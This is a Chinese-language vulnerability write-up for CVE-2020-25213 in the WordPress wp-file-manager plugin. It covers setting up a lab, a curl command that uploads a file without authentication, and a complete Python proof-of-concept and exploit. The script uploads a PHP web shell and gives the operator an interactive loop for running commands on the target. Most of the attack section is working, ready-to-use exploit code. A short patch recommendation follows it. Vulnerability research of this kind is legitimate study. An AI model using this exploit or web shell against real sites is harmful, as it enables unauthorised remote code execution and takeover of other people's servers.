0x01 漏洞概述
WordPress是一套使用PHP語言開發的博客平台,該平台支持在PHP和MySQL的服務器上架設個人博客網站。而WordPress的文件管理器插件(wp-file-manager)6.9版本之前存在安全漏洞,該漏洞允許遠程攻擊者上傳和執行任意PHP代碼。
0x02 影響版本
WordPress 文件管理器(wp-file-manager)插件 6.0-6.8 版本
0x03 環境搭建
- phpstudy2018
- WordPress
https://wordpress.org/download/
- wp-file-manager 6.0版本
https://wordpress.org/plugins/wp-file-manager/advanced/
①將WordPress啟動安裝程序
- 安裝教程參考鏈接:
https://codex.wordpress.org/zh-cn:%E5%AE%89%E8%A3%85_WordPress(可能需使用魔法訪問)
或者推薦百度查找,這里不多贅述。
- 搭建成功后的WordPress首頁
- 進入管理員后台安裝wp-file-manager 6.0插件
http://YourIP/wordpress/wp-admin/plugin-install.php
將插件安裝完如下:
http://YourIP/wordpress/wp-admin/plugins.php
0x04 漏洞復現
- 瀏覽器訪問
http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
出現下面到的errUnknowCmd說明漏洞存在
- 使用curl命令將本地文件用POST方法上傳
curl -F cmd=upload -F target=l1_ -F upload[]=@test.php -XPOST "http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
test.php文件內容:
- 訪問上傳的文件查看
上傳路徑:
http://YourIP/wordpress/wp-content/plugins/wp-file-manager/lib/files/test.php
0x05 漏洞POC&EXP
# -*- coding:utf-8 -*-
import json
import requests
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/91.0.4472.124 Safari/537.36 "
}
url_tail = "/wordpress/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
upfiles_path = "/wordpress/wp-content/plugins/wp-file-manager/lib/files"
payload = "?cmd="
"""
漏洞驗證_1
檢測響應中是否有errUnknownCmd
"""
def Check_1(url):
url_2 = url + url_tail
res1 = requests.get(url=url_2, headers=headers)
text1 = res1.text
text2 = json.loads(text1)
key = json.dumps(text2) # 將json轉換為字符串
print(text2)
key1 = "errUnknownCmd"
if key1 in key:
print("疑似漏洞存在")
Next = input("是否進一步驗證 Y or N :")
if Next == "Y":
Check_2(url)
else:
print("漏洞不存在")
"""
漏洞驗證_2
訪問上傳的php文件是否有正確響應
這里上傳的php文件內容:<?php phpinfo() ?>
"""
def Check_2(url):
data = {
'cmd': 'upload',
'target': 'l1_',
}
files = {
'upload[0]': open('phpinfo.php', 'rb'),
}
url_3 = url + url_tail
res = requests.post(url=url_3, headers=headers, data=data, files=files, verify=False)
if res.status_code == requests.codes.ok:
# print("上傳成功!")
d = res.json()
p = d.get('added', [])[0].get('url')
Finally_url = f'{url}{p}'
res2 = requests.get(url=Finally_url, headers=headers)
key2 = "PHP Version"
if key2 in res2.text:
print("CVE-2020-25213漏洞存在! ")
flag = input("是否進行漏洞利用 Y or N :")
if flag == "Y":
while 1:
command = input("輸入執行的命令: ")
if command == "exit":
break
exploit(url, command)
else:
print("漏洞不存在!")
"""
漏洞利用
上傳php文件並調用命令執行
exploit.php內容:<?php system($_GET['cmd']); ?>
"""
def exploit(url, command):
data = {
'cmd': 'upload',
'target': 'l1_',
}
files = {
'upload[0]': open('exploit.php', 'rb'),
}
url_2 = url + url_tail
file_status = url + upfiles_path + "/exploit.php"
res = requests.get(url=file_status, headers=headers, verify=False)
if res.status_code == requests.codes.ok:
Fin_url = file_status + payload + command
res3 = requests.get(url=Fin_url, headers=headers)
res3.encoding = 'gbk'
print(res3.text)
else:
res2 = requests.post(url=url_2, headers=headers, data=data, files=files, verify=False)
if res2.status_code == requests.codes.ok:
# print("上傳成功!")
d = res2.json()
p = d.get('added', [])[0].get('url')
url_3 = f'{url}{p}'
Fin_url = url_3 + payload + command
res2 = requests.get(url=Fin_url, headers=headers)
res2.encoding = 'gbk'
print(res2.text)
def main():
url = input("輸入測試的URL:")
Check_1(url)
if __name__ == '__main__':
main()
剛開始學習寫POC與EXP,有哪里有問題的歡迎大佬們指出_(:з」∠)_
0x06 修復建議
更新wp-file-manager插件至6.9或更高版本